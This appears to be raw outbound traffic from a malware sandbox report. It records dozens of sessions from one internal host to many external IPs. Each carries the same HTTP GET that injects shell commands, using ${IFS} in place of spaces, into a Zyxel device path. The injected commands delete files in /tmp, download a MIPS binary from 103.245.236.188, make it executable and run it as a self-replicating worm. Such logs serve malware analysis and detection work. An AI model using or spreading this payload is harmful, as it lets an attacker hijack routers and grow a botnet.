                                    Jan 13, 2024 19:02:36.219584942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4802192.168.2.134870435.226.165.193443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.219666004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4803192.168.2.1349252102.73.91.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.219727039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4804192.168.2.134838095.100.113.206443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.219782114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4805192.168.2.1355634162.114.95.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.219861031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4806192.168.2.135584061.79.143.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.219924927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4807192.168.2.134168675.65.255.14443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.219990015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4808192.168.2.135882468.183.247.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.220053911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4809192.168.2.1348634181.179.148.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.220110893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4810192.168.2.1347718131.3.191.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.220134974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4811192.168.2.1340204218.69.82.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.220222950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4812192.168.2.1346644211.160.188.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.220303059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4813192.168.2.1334054119.70.239.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.220324039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4814192.168.2.1353386194.253.123.137443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.220372915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4815192.168.2.1345562195.140.140.16443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.220444918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4816192.168.2.1353512155.254.255.194443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.220488071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4817192.168.2.1332924131.250.65.174443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.220568895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4818192.168.2.134246024.122.39.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.220602036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4819192.168.2.1348924148.222.210.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.220658064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4820192.168.2.135455050.98.108.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.220710993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4821192.168.2.1355028221.196.101.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.220762968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4822192.168.2.134261896.86.74.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.220853090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4823192.168.2.1347344177.142.224.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.220920086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4824192.168.2.1348252136.118.57.40443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.220978022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4825192.168.2.1358362117.179.170.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.221048117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4826192.168.2.1353298110.220.53.169443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.221103907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4827192.168.2.1342808138.130.26.98443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.221163988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4828192.168.2.1350214216.124.13.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.221251965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4829192.168.2.1348130118.198.202.193443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.221299887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4830192.168.2.1344814103.176.91.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.221375942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4831192.168.2.1347378206.115.67.204443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.221421003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4832192.168.2.1345442201.183.10.143443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.221493006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4833192.168.2.1353670108.234.206.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.221546888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4834192.168.2.136038667.135.140.51443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.221638918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4835192.168.2.1345502219.15.98.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.221674919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4836192.168.2.1343540123.196.101.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.221740007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4837192.168.2.135902458.102.193.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.221801043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4838192.168.2.1339620137.122.27.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.221867085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4839192.168.2.135241283.132.220.63443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.221901894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4840192.168.2.1345802209.195.77.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.221963882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4841192.168.2.1348928180.53.229.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.221993923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4842192.168.2.1344682202.100.244.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.222079992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4843192.168.2.1346186185.201.213.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.222127914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4844192.168.2.135525498.190.215.159443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.222174883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4845192.168.2.1334348216.154.50.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.222229958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4846192.168.2.1338708105.153.17.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.222286940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4847192.168.2.1346432128.191.166.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.222347975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4848192.168.2.134685864.196.138.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.222389936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4849192.168.2.1358326221.92.19.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.222436905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4850192.168.2.134250274.249.133.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.222503901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4851192.168.2.1345030209.151.244.75443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.222567081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4852192.168.2.1344500165.41.126.121443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.222635031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4853192.168.2.133483643.167.40.215443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.222681999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4854192.168.2.1360786169.234.35.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.222718954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4855192.168.2.135523274.169.246.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.222786903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4856192.168.2.1341020119.183.230.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.222855091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4857192.168.2.1342642222.255.92.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.222920895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4858192.168.2.135124492.169.182.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.222974062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4859192.168.2.1343822120.100.88.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.223035097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4860192.168.2.1352842126.184.53.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.223066092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4861192.168.2.1356402183.64.40.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.223105907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4862192.168.2.133344099.61.78.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.223212957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4863192.168.2.135780223.58.147.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:36.223237038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4864192.168.2.1333502174.186.53.57443
                                    TimestampBytes transferredDirectionData
